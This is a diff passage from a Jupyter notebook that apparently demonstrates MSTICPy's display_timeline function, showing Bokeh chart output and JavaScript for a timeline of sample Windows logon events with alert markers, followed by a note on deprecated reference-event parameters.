+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"ea1f9688-5a64-4d05-953b-0261cf7f16c3\" data-root-id=\"2641\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"8ae3ef8a-6ca8-4873-b47a-ba723c2e8c2a\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"2531\"},{\"id\":\"2563\"}]},\"id\":\"2641\",\"type\":\"Column\"},{\"attributes\":{\"below\":[{\"id\":\"2542\"}],\"center\":[{\"id\":\"2545\"},{\"id\":\"2549\"},{\"id\":\"2628\"},{\"id\":\"2634\"},{\"id\":\"2640\"}],\"height\":300,\"left\":[{\"id\":\"2546\"},{\"id\":\"2622\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"2607\"},{\"id\":\"2613\"},{\"id\":\"2619\"},{\"id\":\"2626\"},{\"id\":\"2632\"},{\"id\":\"2638\"}],\"title\":{\"id\":\"2532\"},\"toolbar\":{\"id\":\"2556\"},\"width\":900,\"x_range\":{\"id\":\"2534\"},\"x_scale\":{\"id\":\"2538\"},\"y_range\":{\"id\":\"2536\"},\"y_scale\":{\"id\":\"2540\"}},\"id\":\"2531\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"LogonType\":[4,4],\"TargetLogonId\":[\"0xfaac27\",\"0xf0c9d6\"],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAIBxK/IR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[2]},\"index\":[0,5],\"y_index\":[0,0]},\"selected\":{\"id\":\"2652\"},\"selection_policy\":{\"id\":\"2653\"}},\"id\":\"2527\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"2657\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data\":{\"x\":[1547525905489.9998,1547525905489.9998],\"y\":[0,3]},\"selected\":{\"id\":\"2660\"},\"selection_policy\":{\"id\":\"2661\"}},\"id\":\"2629\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"2658\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"2629\"},\"glyph\":{\"id\":\"2630\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2631\"},\"view\":{\"id\":\"2633\"}},\"id\":\"2632\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2568\",\"type\":\"DataRange1d\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"2677\"},{\"id\":\"2678\"},{\"id\":\"2679\"},{\"id\":\"2680\"},{\"id\":\"2681\"},{\"id\":\"2682\"},{\"id\":\"2683\"},{\"id\":\"2684\"},{\"id\":\"2685\"},{\"id\":\"2686\"},{\"id\":\"2687\"},{\"id\":\"2688\"}]},\"id\":\"2575\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"TargetLogonId\",\"@TargetLogonId\"]]},\"id\":\"2530\",\"type\":\"HoverTool\"},{\"attributes\":{\"background_fill_alpha\":0.3,\"background_fill_color\":\"white\",\"border_line_alpha\":0.3,\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< MSTICAdmin\",\"text_alpha\":0.5,\"text_font_size\":\"8pt\",\"x\":1547529315183.0,\"y\":0,\"y_offset\":10},\"id\":\"2628\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"2660\",\"type\":\"Selection\"},{\"attributes\":{\"line_alpha\":0.5,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"2636\",\"type\":\"Line\"},{\"attributes\":{\"text\":\"Timeline: Processes with marker\"},\"id\":\"2532\",\"type\":\"Title\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"2625\",\"type\":\"Line\"},{\"attributes\":{\"line_alpha\":0.5,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"2630\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"2663\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"end\":1547530591064.3,\"start\":1547515271728.7},\"id\":\"2534\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2659\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"source\":{\"id\":\"2629\"}},\"id\":\"2633\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2661\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"end\":2.3333333333333335,\"start\":-0.3333333333333333},\"id\":\"2536\",\"type\":\"Range1d\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"2564\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"2635\"}},\"id\":\"2639\",\"type\":\"CDSView\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2602\"},\"major_label_policy\":{\"id\":\"2647\"},\"ticker\":{\"id\":\"2543\"}},\"id\":\"2542\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"2631\",\"type\":\"Line\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"2637\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"2538\",\"type\":\"LinearScale\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2664\"},{\"id\":\"2665\"},{\"id\":\"2666\"},{\"id\":\"2667\"},{\"id\":\"2668\"},{\"id\":\"2669\"},{\"id\":\"2670\"},{\"id\":\"2671\"},{\"id\":\"2672\"},{\"id\":\"2673\"},{\"id\":\"2674\"},{\"id\":\"2675\"}]},\"id\":\"2543\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"2635\"},\"glyph\":{\"id\":\"2636\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2637\"},\"view\":{\"id\":\"2639\"}},\"id\":\"2638\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2540\",\"type\":\"LinearScale\"},{\"attributes\":{\"active_multi\":{\"id\":\"2597\"},\"tools\":[{\"id\":\"2597\"}]},\"id\":\"2578\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2662\",\"type\":\"Selection\"},{\"attributes\":{\"axis\":{\"id\":\"2542\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2545\",\"type\":\"Grid\"},{\"attributes\":{\"data\":{\"x\":[1547528066007.0,1547528066007.0],\"y\":[0,3]},\"selected\":{\"id\":\"2662\"},\"selection_policy\":{\"id\":\"2663\"}},\"id\":\"2635\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2554\",\"type\":\"PanTool\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2665\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"2646\"},\"major_label_policy\":{\"id\":\"2644\"},\"ticker\":{\"id\":\"2547\"},\"visible\":false},\"id\":\"2546\",\"type\":\"LinearAxis\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2664\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"2555\"}},\"id\":\"2551\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"2547\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"2654\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2667\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2666\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2546\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2549\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2655\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis\":{\"id\":\"2574\"},\"ticker\":null},\"id\":\"2577\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2653\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2668\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2652\",\"type\":\"Selection\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2550\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"data_source\":{\"id\":\"2623\"},\"glyph\":{\"id\":\"2624\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2625\"},\"view\":{\"id\":\"2627\"}},\"id\":\"2626\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2644\",\"type\":\"AllLabels\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2671\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2656\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2669\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"2623\"}},\"id\":\"2627\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2670\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2580\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"2646\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2672\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"2598\"},\"x_range\":{\"id\":\"2534\"},\"y_range\":null},\"id\":\"2597\",\"type\":\"RangeTool\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\adm1nistrator\"],\"LogonType\":[3],\"TargetLogonId\":[\"0xfb5ee6\"],\"TimeGenerated\":{\"__ndarray__\":\"ALAP9P6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[2],\"y_index\":[1]},\"selected\":{\"id\":\"2654\"},\"selection_policy\":{\"id\":\"2655\"}},\"id\":\"2528\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2673\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2552\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"2649\",\"type\":\"AllLabels\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2674\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"2527\"},\"glyph\":{\"id\":\"2583\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2584\"},\"view\":{\"id\":\"2586\"}},\"id\":\"2585\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2647\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2584\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"2675\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"2553\",\"type\":\"SaveTool\"},{\"attributes\":{\"source\":{\"id\":\"2527\"}},\"id\":\"2586\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2583\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"2570\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2593\",\"type\":\"Circle\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2677\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"below\":[{\"id\":\"2574\"},{\"id\":\"2579\"}],\"center\":[{\"id\":\"2577\"}],\"height\":120,\"renderers\":[{\"id\":\"2585\"},{\"id\":\"2590\"},{\"id\":\"2595\"}],\"title\":{\"id\":\"2564\"},\"toolbar\":{\"id\":\"2578\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"2566\"},\"x_scale\":{\"id\":\"2570\"},\"y_range\":{\"id\":\"2568\"},\"y_scale\":{\"id\":\"2572\"}},\"id\":\"2563\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"source\":{\"id\":\"2528\"}},\"id\":\"2591\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"2528\"},\"glyph\":{\"id\":\"2588\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2589\"},\"view\":{\"id\":\"2591\"}},\"id\":\"2590\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2678\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"background_fill_alpha\":0.3,\"background_fill_color\":\"white\",\"border_line_alpha\":0.3,\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< MSTICAlertsWin1$\",\"text_alpha\":0.5,\"text_font_size\":\"8pt\",\"x\":1547525905489.9998,\"y\":0,\"y_offset\":20},\"id\":\"2634\",\"type\":\"Label\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2680\",\"type\":\"DaysTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2530\"},{\"id\":\"2550\"},{\"id\":\"2551\"},{\"id\":\"2552\"},{\"id\":\"2553\"},{\"id\":\"2554\"}]},\"id\":\"2556\",\"type\":\"Toolbar\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2679\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"end\":1547531229369.95,\"start\":1547514633423.05},\"id\":\"2566\",\"type\":\"Range1d\"},{\"attributes\":{\"fill_color\":{\"value\":\"#208F8C\"},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2588\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2589\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"2529\"},\"glyph\":{\"id\":\"2593\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2594\"},\"view\":{\"id\":\"2596\"}},\"id\":\"2595\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2681\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2572\",\"type\":\"LinearScale\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2555\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2684\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2605\",\"type\":\"Scatter\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2682\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2594\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2683\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"2598\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"background_fill_alpha\":0.3,\"background_fill_color\":\"white\",\"border_line_alpha\":0.3,\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< MSTICAlertsWin1$\",\"text_alpha\":0.5,\"text_font_size\":\"8pt\",\"x\":1547528066007.0,\"y\":0,\"y_offset\":30},\"id\":\"2640\",\"type\":\"Label\"},{\"attributes\":{\"source\":{\"id\":\"2529\"}},\"id\":\"2596\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2685\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1\\\\adm1nistrator\"},\"renderers\":[{\"id\":\"2613\"}]},\"id\":\"2615\",\"type\":\"LegendItem\"},{\"attributes\":{\"line_alpha\":0.5,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"2624\",\"type\":\"Line\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2602\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2686\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"2580\"},\"major_label_policy\":{\"id\":\"2649\"},\"ticker\":{\"id\":\"2575\"}},\"id\":\"2574\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"2579\",\"type\":\"Title\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1\\\\MSTICAdmin\"},\"renderers\":[{\"id\":\"2607\"}]},\"id\":\"2609\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2687\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"2527\"}},\"id\":\"2608\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2688\",\"type\":\"YearsTicker\"},{\"attributes\":{\"label\":{\"value\":\"NT AUTHORITY\\\\SYSTEM\"},\"renderers\":[{\"id\":\"2619\"}]},\"id\":\"2621\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2611\",\"type\":\"Scatter\"},{\"attributes\":{\"source\":{\"id\":\"2528\"}},\"id\":\"2614\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2606\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"2527\"},\"glyph\":{\"id\":\"2605\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2606\"},\"view\":{\"id\":\"2608\"}},\"id\":\"2607\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"Account\":[\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[5,5,5,5,5,5,5,5,5,5,5],\"TargetLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"TimeGenerated\":{\"__ndarray__\":\"AHCb8/6EdkIA0CX1/oR2QgBQCfb+hHZCABCzePiEdkIAUEV5+IR2QgAQTWn2hHZCAPDeafaEdkIAQE/J8oR2QgCgGfTyhHZCAJDayPeEdkIAsG3J94R2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[11]},\"index\":[1,3,4,6,7,8,9,10,11,12,13],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2]},\"selected\":{\"id\":\"2656\"},\"selection_policy\":{\"id\":\"2657\"}},\"id\":\"2529\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"2529\"}},\"id\":\"2620\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2617\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2612\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"2528\"},\"glyph\":{\"id\":\"2611\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2612\"},\"view\":{\"id\":\"2614\"}},\"id\":\"2613\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"x\":[1547529315183.0,1547529315183.0],\"y\":[0,3]},\"selected\":{\"id\":\"2658\"},\"selection_policy\":{\"id\":\"2659\"}},\"id\":\"2623\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"2621\"},{\"id\":\"2615\"},{\"id\":\"2609\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"2622\",\"type\":\"Legend\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2618\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"2529\"},\"glyph\":{\"id\":\"2617\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2618\"},\"view\":{\"id\":\"2620\"}},\"id\":\"2619\",\"type\":\"GlyphRenderer\"}],\"root_ids\":[\"2641\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"8ae3ef8a-6ca8-4873-b47a-ba723c2e8c2a\",\"root_ids\":[\"2641\"],\"roots\":{\"2641\":\"ea1f9688-5a64-4d05-953b-0261cf7f16c3\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2641"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "alerts = processes_on_host.sample(3)\r\n",
+    "\r\n",
+    "display_timeline(\r\n",
+    "    host_logons,\r\n",
+    "    title=\"Processes with marker\",\r\n",
+    "    group_by=\"Account\",\r\n",
+    "    source_columns=[\"Account\", \"TargetLogonId\", \"LogonType\"],\r\n",
+    "    ref_events=alerts,\r\n",
+    "    ref_col=\"SubjectUserName\",\r\n",
+    "    legend=\"left\",\r\n",
+    "    ygrid=True,\r\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "For a single reference point you can also use `alert`, `ref_event`\r\n",
+    "or `ref_time` although these are now deprecated in\r\n",
+    "favor of `ref_events` and `ref_times`.\r\n",
+    "\r\n",
+    "Use `ref_event` (note: this is different from `ref_events`)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.429665Z",
+     "start_time": "2020-01-30T20:46:29.332696Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2924\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete 